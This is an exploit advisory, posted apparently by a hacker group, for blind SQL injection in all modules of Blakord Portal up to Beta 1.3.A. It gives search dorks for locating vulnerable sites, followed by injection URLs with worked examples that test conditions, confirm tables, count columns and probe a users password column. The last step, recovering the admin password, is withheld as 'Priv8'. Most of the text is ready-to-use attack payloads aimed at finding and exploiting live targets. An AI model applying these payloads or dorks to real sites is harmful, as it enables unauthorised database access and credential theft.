|
Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection.=0D
=0D
[+] Info:=0D
=0D
[~] Software: Blakord Portal=0D
[~] HomePage: http://www.cdv3k.com=0D
[~] Exploit: Blind Sql Injection [High]=0D
[~] Where: All Modules=0D
[~] Bug Found By: JosS / Jose Luis G=F3ngora Fern=E1ndez=0D
[~] Contact: sys-project[at]hotmail.com=0D
[~] Web: http://www.spanish-hackers.com=0D
[~] Dork: "Power by Blakord Portal"=0D
[~] Dork2: "Powered by Blakord Portal"=0D
[~] Dork3: "Blakord Portal"=0D
=0D
[+] Compression:=0D
=0D
[~] True: http://localhost/[path]/[any module]?id=1 and 1=1=0D
[~] False: http://localhost/[path]/[any module]?id=1 and 1=2=0D
=0D
[+] Exploding:=0D
=0D
[*] Checking table: =0D
=0D
[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) >= 0=0D
[~] Exploit2: http://localhost/[path]/[any module]?id=1 and exists (select * from [TABLE])=0D
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) >= 0=0D
[~] Example2: http://localhost/[path]/[any module]?id=1 and exists (select * from users)=0D
[~] If you don't see any error, it is tha table exist.=0D
=0D
[*] Checking columns number of table:=0D
=0D
[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM [TABLE]) = [NUMBER]=0D
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(*) FROM users) = 6=0D
[~] If you don't see any error, the table has 6 columns.=0D
=0D
[*] Checking columns of table:=0D
=0D
[~] Exploit: http://localhost/[path]/[any module]?id=1 AND (SELECT Count([COLUMN]) FROM [TABLE]) >= 0=0D
[~] Example: http://localhost/[path]/[any module]?id=1 AND (SELECT Count(U_PASSWORD) FROM users) >= 0=0D
[~] If you don't see any error, the column exists.=0D
=0D
[*] Admin Password; Noob or Lammer?:=0D
=0D
[~] Exploit: Priv8=0D
[~] Example: Priv8=0D
[~] Priv8 , xD.=0D
[+] [The End]